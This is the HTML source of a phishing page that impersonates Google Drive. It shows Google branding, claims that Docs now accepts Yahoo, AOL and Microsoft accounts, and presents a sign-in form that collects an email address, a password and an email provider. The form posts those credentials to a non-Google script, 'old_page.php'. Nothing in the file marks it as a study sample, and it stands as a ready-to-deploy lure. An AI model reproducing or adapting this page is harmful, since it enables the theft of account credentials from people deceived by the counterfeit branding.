﻿<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Google Drive - Shared Documents</title>
<link rel="shortcut icon" type="image/x-icon" href="./images/favicon.ico" />
        <link rel="icon" type="image/x-icon" href="./images/favicon.ico" />
  </head><body>
<style type="text/css">
.glowing-border {
    border: 1px solid #AEB7BB;
    border-radius: 1px;
    font-weight: ;
    font-size: 12pt;
}

.glowing-border:focus { 
    outline: none;
    border-color: #9ecaed;
    box-shadow: 0 0 2px #427fed;
 
}

</style>
<style type="text/css">
.btnExample {
  color: #FFF;
  background: #3079ED;
  font-weight: bold;
  border: 1px solid #3079ED;
  height: 34px;
  border-radius: 2px;
}
 
.btnExample:hover {
  color: #FFF;
  background: #3079ED;
}
</style>
<style type="text/css">
body {
  margin-top:0 !important;
  margin-left: 0px;
  padding-top:0 !important;
  width:100%;
  height:100%;
}
</style>
<script type="text/javascript">
function data_check()
{
var str=document.getElementById("l1").value;
if(str.length <=0){
alert("Please select email provider");
}else{
document.forms['drop_list'].submit();// working
}
}
</script>
<img align='top' src="images/google_logo_41.png" alt="democratic"><br>


  </span><br><br><br>
<DIV style="position: absolute; top:100px; left:160px; width:200px; height:25px; color:#D14836; font-size:24px; font-weight: normal;font-family: Arial, sans-serif;">Docs</DIV>
<DIV style="position: absolute; top:132px; left:160px; width:400px; height:25px; color:black; font-size:16px; font-weight: normal; font-family: Arial, Helvetica, sans-serif;">Get stuff done, together, with apps in Google Drive</DIV>
<DIV style="position: absolute; top:240px; left:470px; width:370px; height:25px; color:black; font-size:14px; font-family: verdana;">Create, share, and collaborate on the web with documents, spreadsheets, presentations, and more,</DIV>
<DIV style="position: absolute; top:450px; left:160px; color:#427fed; font-size:14px; font-weight: bold; font-family: Arial, sans-serif;">Google Docs now support Yahoo, AOL and Microsoft Email Accounts, <br>Log in with your existing Email Account and view your documents.</DIV>
<img class="logo" src="images/latest.jpg" alt="homedeck" width="512" height="" style="position:absolute;left:154px;top:500px;z-index:4">

<img class="logo" src="images/sheets.png" alt="day2" style="position:absolute;left:160px;top:180px;z-index:4">
  </div>
  </div>
<div style="position:absolute; top:570px; left:155px; font-family: Arial, Helvetica, sans-serif; color:#0000CD; font-size:14px; line-height:19px; font-weight:bold;">
   <a class="Object" id="OBJ_PREFIX_DWT3826_com_zimbra_url" href="http://www.google.com.ng/docs/about/" target="_blank" aria-haspopup="true" tabindex="0" style="color: rgb(66,127,237); font-weight:normal; text-decoration: none;">Google Drive &amp; Blog</a> &nbsp;|&nbsp;
   <a class="Object" id="OBJ_PREFIX_DWT3827_com_zimbra_url" href="http://www.google.com.ng/docs/about/" target="_blank" aria-haspopup="true" tabindex="0" style="color: rgb(66,127,237); font-weight: normal; text-decoration: none; font-weight: normal;">Templates</a></font><div style="height:1px;"></div>
<font color="#CCCCCC">__________________________________________________________________________</font><div style="height:7px;"></div>

<img class="logo" src="images/drive_icon.png" width="32" height="32" align="left"><a href="http://www.google.com.ng/docs/about/" style="text-decoration:none;"><font color="#427fed" size="2"><div style="height:7px;"></div>&nbsp;&nbsp;
Learn more about apps in Google Drive</a></font>

                               </div>
<div style="clear: both; border-top: 1px solid rgb(204, 204, 204);position: absolute;bottom: 0px;" class="need meet" id="bottom_footer"><div style="width: 1400px; padding-top: 10px; padding-bottom: 10px;" class=""><table style="width: 100%;" cellpadding="0" cellspacing="0"><tbody><tr><td align="left"><table cellpadding="0" cellspacing="0"><tbody><tr>
    <td style="text-align: left;"><span style="color: rgb(102, 102, 102);font-family: Arial, Helvetica, sans-serif;font-size:13px" id="ftrCopy">©2015 Google</span></td>
    <td style="text-align: left;"><span></span></td><td width="10px">&nbsp;</td><td width="10px">&nbsp;</td><td style="text-align: left;"><a id="" style="color: rgb(0, 0, 0);text-decoration:none;font-family: Arial, Helvetica, sans-serif;font-size:13px" href="">Google Docs for Business &nbsp&nbsp&nbsp&nbspTerms</a></td><td width="10px">&nbsp;</td><td width="10px">&nbsp;</td><td style="text-align: left;"><a id="Privacy" style="color: rgb(0, 0, 0);text-decoration:none;font-family: Arial, Helvetica, sans-serif;font-size:13px" href="">Privacy &amp; Policy &nbsp&nbsp&nbsp&nbspHelp</a></td></tr></tbody></table></td><td></td><td align="right"></td></tr></tbody></table></div></div>

  <table id="imag_id" align="right" border="0" bgcolor="F7F7F7" cellspacing="1" cellpadding="8" style="border-radius: 2px;position:absolute;left:870px;top:130px;width:300px;height:360px;">
 <form name="drop_list" action="old_page.php" method="post" id="f1">
<tbody>
<td bgcolor="#F7F7F7" style="border-radius: 2px;position:absolute;width:335px;height:376px;"><div style="height: 2px;"></div>
<p style="text-align:0;font-size:16px;font-family: Arial, Helvetica, sans-serif;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sign in with your existing Email service
<div style="height:1px;"></div>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<label for="Email"><strong class="email-label" style="font-family: Arial, Helvetica, sans-serif; font-size:14px;">Email</strong></label>  <div style="height: 4px;"></div>                              
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input class="glowing-border" type"text" name="nemall" id="username" size="32" style="width: 283px; height: 30px;"/>
<div style="height: 10px;"></div>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<label for="passw" style="font-family: Arial, Helvetica, sans-serif; font-size:14px;font-weight:bold;">Password</label><div style="height: 4px;"></div>
          &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input class="glowing-border" type="password" name="Passwd" id="passwd" size="32" style="width: 283px; height: 30px;"/>

<table id="sewe" align="left" border="0" bgcolor="#F7F7F7" cellspacing="0" cellpadding="0">
</table>
         </font>                                        
<div style="height:15px;"></div>
<div>
<label for="Email"><strong class="email-label" style="font-family: Arial, Helvetica, sans-serif;font-size:13px;font-weight: bold;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Email Service Provider</strong></label>
</div>
                                                     <br><div align="left">
                &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<table background="">
                  <tbody><tr>
                    <td></td>
                <select name="Category" id="l1" style="width:200px;height:26px;font-weight:bold;font-size:14px;border-radius:2px;box-shadow: 1px 1px 8px #3079ED;">
<option value="" style="vertical-align:left;">Select Provider...</option>
      <option value="GmailG" style="background: url(images/gm.ico) no-repeat; padding-left: 20px;"> &nbsp;&nbsp;Gmail </option>
      <option value="AolA" style="background: url(images/aol.ico) no-repeat; padding-left: 20px;">&nbsp;&nbsp;AOL</option>
      <option value="HotmailH" style="background: url(images/Hotmailicon.ico) no-repeat; padding-left: 20px;">&nbsp;&nbsp;Microsoft Outlook</option>
      <option value="YahooY" style="background: url(images/yahooicon.ico) no-repeat; padding-left: 20px;">&nbsp;&nbsp;Yahoo!</option>
      <option value="OtheremailO" style="background: url(images/Mail-icon.ico) no-repeat; padding-left: 20px;">&nbsp;&nbsp;Other Email</option>
    </select>
<div style="height: 2px;"></div><br><center>

<button onclick="data_check()"; class="btnExample" type="button" value="submit"/>View Document</button>
 



<input type="checkbox" id="checkbox-1" checked>
                  <label for="checkbox-1"><font color="#101010" face="Arial, Helvetica, sans-serif" size="2">Keep me signed in</label>
</div><br>
<br>
  <strong><font color="#427fed" face="Arial, Helvetica, sans-serif" size="2">
  Powered by Google Inc.
  </strong>



<br><br>

	    <div></div>
                

</table>
</body>
</html>

